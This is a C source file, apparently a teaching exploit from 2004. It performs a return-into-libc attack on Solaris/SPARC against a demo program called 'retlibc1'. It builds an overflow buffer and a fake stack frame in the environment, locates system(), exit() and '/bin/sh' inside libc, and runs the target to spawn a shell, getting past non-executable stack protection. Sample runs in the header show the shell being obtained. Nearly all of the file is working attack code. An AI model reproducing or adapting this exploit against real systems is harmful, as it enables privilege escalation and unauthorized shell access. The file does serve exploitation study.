/*
 * $Id: retlibc1-ex2.c,v 1.4 2007/01/09 16:03:13 raptor Exp $
 *
 * retlibc1-ex2.c - retlibc1.c exploit (Solaris/SPARC retlibc)
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * Another fully-automated exploit that returns into system() in libc, with
 * a chained exit(). It effectively bypasses the non-exec stack protection
 * of Solaris/SPARC systems (noexec_user_stack=1 option in /etc/system). This
 * time we directly use the address of a "/bin/sh" string inside libc. Note
 * that the system() function may drop privileges... Depending on some weird
 * conditions, returning into system may be a real pain in the ass. Finally,
 * for some reason, the chained exit() doesn't work properly on 32-bit systems.
 *
 * NOTE. The additional fake frame filler is needed for the exploit to work
 * properly on Solaris 10 systems (thanks to KF <dotslash@globalintersec.com>
 * for giving me access to his box).
 *
 * Compile with: "gcc retlibc1-ex2.c -o retlibc1-ex2 -lc -ldl".
 *
 * bash-2.05$ uname -a
 * SunOS morgana 5.9 Generic sun4u sparc SUNW,Ultra-5_10
 * bash-2.05$ gcc --version
 * gcc (GCC) 3.2
 * bash-2.05$ ./retlibc1-ex2
 * Using SI_PLATFORM       : SUNW,Ultra-5_10 (5.9)
 * Using stack base        : 0xffbffffc
 * Using ff address        : 0xffbfff9c
 * Using shell address     : 0xff3264d0
 * Using exit() address    : 0xff31d34c
 * Using system() address  : 0xff311d74
 * $
 *
 * bash-2.05$ uname -a
 * SunOS sparchina 5.6 Generic_105181-05 sun4c sparc SUNW,Sun_4_50
 * bash-2.05$ gcc --version
 * 2.95.3
 * bash-2.05$ ./retlibc1-ex2
 * Using SI_PLATFORM       : SUNW,Sun_4_50 (5.6)
 * Using stack base        : 0xeffffffc
 * Using ff address        : 0xefffffa0
 * Using shell address     : 0xef7a04b0
 * Using exit() address    : 0xef7974ac
 * Using system() address  : 0xef778b3c
 * $
 *
 */

#include <dlfcn.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define VULN 	"./retlibc1"	// the vulnerable program
#define BUF	336 + 1		// size of the evil buffer
#define FF	64 + 1		// size of the fake frame
#define SHELL	"/bin/sh"	// command to be executed
#define DUMMY	0xdeadbeef	// dummy memory address

/* voodoo macros */
#define	VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define	VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}

/* (ugly) global variables */
char	*arg[256];
int	arg_pos = 0, arg_len = 0;
char	*env[256];
int	env_pos = 0, env_len = 0;

/* 
 * add_arg(): add an argument to argv 
 */
int add_arg(char * string)
{
	/* null termination */
	if (!string) {
		arg[arg_pos] = NULL;
		return(arg_len);
	}

	/* take care of argv[0] padding */
	if (!arg_pos) {
		arg[arg_pos] = "AAA";
		arg_len += 4;
		arg_pos++;
	}

	/* actually add the argument to argv */
	arg[arg_pos] = string;
	arg_len += strlen(string) + 1;
	arg_pos++;

	return(arg_len);	
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char * string)
{
	int 	i;

	/* null termination */
	if (!string) {
		env[env_pos] = NULL;
		return(env_len);
	}

	/* add the variable to envp */
	env[env_pos] = string;
	env_len += strlen(string) + 1;	
	env_pos++;

	/* pad the envp using zeroes */
	if ((strlen(string) + 1) % 4)
		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
			env[env_pos] = string + strlen(string);
			env_len++;
		}
	
	return(env_len);
}

/*
 * pad_arg(): pad argv using argv[0] and get a padded envp[0] too
 */
void pad_arg(void)
{
	int 	pad;
	char 	*arg0;

	/* already padded? */
	if (!(arg_len % 4))
		return;

	/* malloc() the right amount of space for padding */
	pad = 4 - (arg_len % 4);
	arg0 = (char *)malloc(pad + strlen(arg[0]) + 1);

	/* write the padding and terminate argv[0] */
	memset(arg0, 'A', (pad + strlen(arg[0]) + 1));
	arg0[(pad + strlen(arg[0]) + 1) - 1] = 0x0;

	/* use the new argv[0] */
	arg_len = arg_len - (strlen(arg[0]) + 1) + strlen(arg0) + 1;
	arg[0] = arg0;

	return;
}

/*
 * fault(): SIGSEGV handler
 */
void fault()
{
	fprintf(stderr, "sorry, pattern not found\n");
	exit(1);
}

/*
 * check_zero(): check an address for the presence of a 0x0
 */
void check_zero(int addr, char *pattern)
{
	if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
	    !(addr & 0xff000000)) {
		fprintf(stderr, "the address of %s contains a 0x0!\n", pattern);
		exit(1);
	}
}

/*
 * search(): search for a symbol inside libc
 */
int search(char *sym)
{
	int addr;

	/* search for the address of the symbol inside libc */
	if ((addr = (int)dlsym(RTLD_NEXT, sym)) == NULL) {
		fprintf(stderr, "sorry, function %s() not found\n", sym);
		exit(1);
	}

	check_zero(addr - 4, sym);
	check_zero(addr - 8, sym);
	return(addr);
}

/*
 * search_str(): search for a string in libc
 */
int search_str(char *pattern, int addr)
{
	/* install SIGSEGV handler and begin search */
	signal(SIGSEGV, fault);

	while (memcmp((void *)addr, pattern, strlen(pattern) + 1))
		addr++;

	/* uninstall SIGSEGV handler and end search */
	signal(SIGSEGV, SIG_DFL);

	check_zero(addr, pattern);
	return(addr);
}

/*
 * main()
 */
int main(int argc, char **argv)
{
	char 	buf[BUF];
	char	ff[FF];
	char 	platform[256], release[256];

	int	*p;
	int 	ff_addr, tmp, offset, rel;
	int	plat_len, prog_len;

	/* get the stack base */
	int 	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;

	/* get the addresses of system(), SHELL, and exit() in libc */
	int	ret = search("system");
	int	shell_addr = search_str(SHELL, ret);
	int	exit_addr = search("exit");

	/* get some system information */
	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
	rel = atoi(release + 2);

	/* fill the evil buffer */
	memset(buf, 'A', sizeof(buf));
	buf[sizeof(buf) - 1] = 0x0;

	/* add the arguments, pad argv and envp[0] */
	add_arg(buf);
	add_arg(NULL);
	pad_arg();

	/* initialize the fake frame */
	bzero(ff, sizeof(ff));

	/* 
	 * saved %l registers
	 */
	p = (int *)(ff);
	*p++ = DUMMY;		/* %l0 */
	*p++ = DUMMY;		/* %l1 */
	*p++ = DUMMY;		/* %l2 */
	*p++ = DUMMY;		/* %l3 */
	*p++ = DUMMY;		/* %l4 */
	*p++ = DUMMY;		/* %l5 */
	*p++ = DUMMY;		/* %l6 */
	*p++ = DUMMY;		/* %l7 */

	/* 
	 * saved %i registers
	 */
	*p++ = shell_addr;	/* %i0: arg to system() */
	*p++ = DUMMY;		/* %i1 */
	*p++ = DUMMY;		/* %i2 */
	*p++ = DUMMY;		/* %i3 */
	*p++ = DUMMY;		/* %i4 */
	*p++ = DUMMY;		/* %i5 */
	*p++ = sb - 1000;	/* %i6: frame pointer */
	*p++ = exit_addr - 8;	/* %i7: return address */

	/* put fake frame in envp, keeping padding */
	ff_addr = add_env(ff);
	add_env(ff);
	add_env(NULL);

	/* calculate the offset to argv[0] (voodoo magic) */
	plat_len = strlen(platform) + 1;
	prog_len = strlen(strrchr(VULN, '/') + 1) + 1;
	offset = arg_len + env_len + plat_len + prog_len;
	if (rel > 7)
		VOODOO64(offset, arg_pos, env_pos)
	else
		VOODOO32(offset, plat_len, prog_len)

	/* calculate the fake frame address in envp[0] */
	tmp = sb - offset + arg_len;
	ff_addr += tmp;

	/* set main()'s %i6 and %i7 */
	p = (int *)(buf + 328);
	*p++ = ff_addr;		/* fake frame address */
	*p++ = ret - 4;		/* return address in libc (must skip save) */

	/* print some output */
	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
	fprintf(stderr, "Using stack base\t: 0x%p\n", sb);
	fprintf(stderr, "Using ff address\t: 0x%p\n", ff_addr);
	fprintf(stderr, "Using shell address\t: 0x%p\n", shell_addr);
	fprintf(stderr, "Using exit() address\t: 0x%p\n", exit_addr);
	fprintf(stderr, "Using system() address\t: 0x%p\n", ret);

	/* run the vulnerable program */
	execve(VULN, arg, env);
	perror("execve");
}
